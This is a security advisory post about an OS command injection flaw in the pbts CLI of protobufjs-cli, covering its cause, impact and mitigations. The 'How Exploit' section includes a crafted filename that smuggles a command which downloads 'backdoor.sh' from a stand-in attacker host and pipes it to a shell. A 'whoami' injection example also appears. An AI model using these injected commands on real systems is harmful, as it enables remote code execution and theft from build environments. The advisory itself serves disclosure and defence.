pbts: OS Command Injection via Unsanitized File Paths in JSDoc Invocation

Listen to this Post

The vulnerability in pbts (a CLI tool for generating TypeScript definitions from protobuf JavaScript files) arises from the way it invokes JSDoc. The pbts tool constructs a shell command string by concatenating user‑controlled input file paths directly into the command, and then executes the resulting string using Node.js’s child_process.exec. Because `exec` delegates the command to the system shell (e.g., bash, cmd.exe), any shell metacharacters present in a file path are interpreted by the shell rather than being passed as plain arguments to JSDoc. For example, a file path containing a semicolon (;), a pipe (|), or a command substitution ($(…)) can cause the shell to execute arbitrary additional commands as part of the same process. The vulnerable code does not sanitize or escape the file paths before embedding them in the command string, allowing an attacker who can influence the filename or path to inject arbitrary shell commands. This leads to full remote code execution when the pbts tool is run on an attacker‑controlled file path, because the injected commands execute with the same privileges as the process running pbts.
Platform: `Node.js / protobufjs-cli`
Version: `Pbts (protobufjs-cli) < 1.2.0` Vulnerability: `OS Command Injection` Severity: `High (CVSS 8.7)` Date: `2026‑05‑12`

Prediction: `Patch date 2026‑05‑15`

What Undercode Say:

Simulate vulnerable command building (conceptual)
FILE_PATH="test.js; whoami"
pbts $FILE_PATH In vulnerable versions, this would execute 'whoami' after the semicolon

How Exploit:

  1. Attacker crafts a filename containing shell metacharacters, e.g., "test.js; curl attacker.com/backdoor.sh | sh".
  2. Attacker places this file in a location where pbts will be invoked.
  3. pbts constructs the command: jsdoc test.js; curl attacker.com/backdoor.sh | sh.
  4. The shell executes both the intended JSDoc command and the injected payload.

Protection from this CVE:

  • Upgrade protobufjs-cli to version 1.2.0 or later.
  • If upgrading is not possible, sanitize all input filenames: replace or reject any file path containing shell metacharacters.
  • Run pbts in an isolated container or with minimal privileges to limit the impact of command execution.
  • Use `child_process.execFile()` with an array of arguments instead of `exec()` to bypass the shell entirely.

Impact:

Successful exploitation allows an attacker to execute arbitrary system commands on the machine running the pbts tool. Since pbts is often used in build pipelines or development environments, this can lead to:
– Full compromise of the build server.
– Theft of source code or credentials.
– Lateral movement within a network.
– Escalation of privileges if pbts is run with elevated rights.

🎯Let’s Practice Exploiting & Learn Patching For Free:

Sources:

Reported By: github.com
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top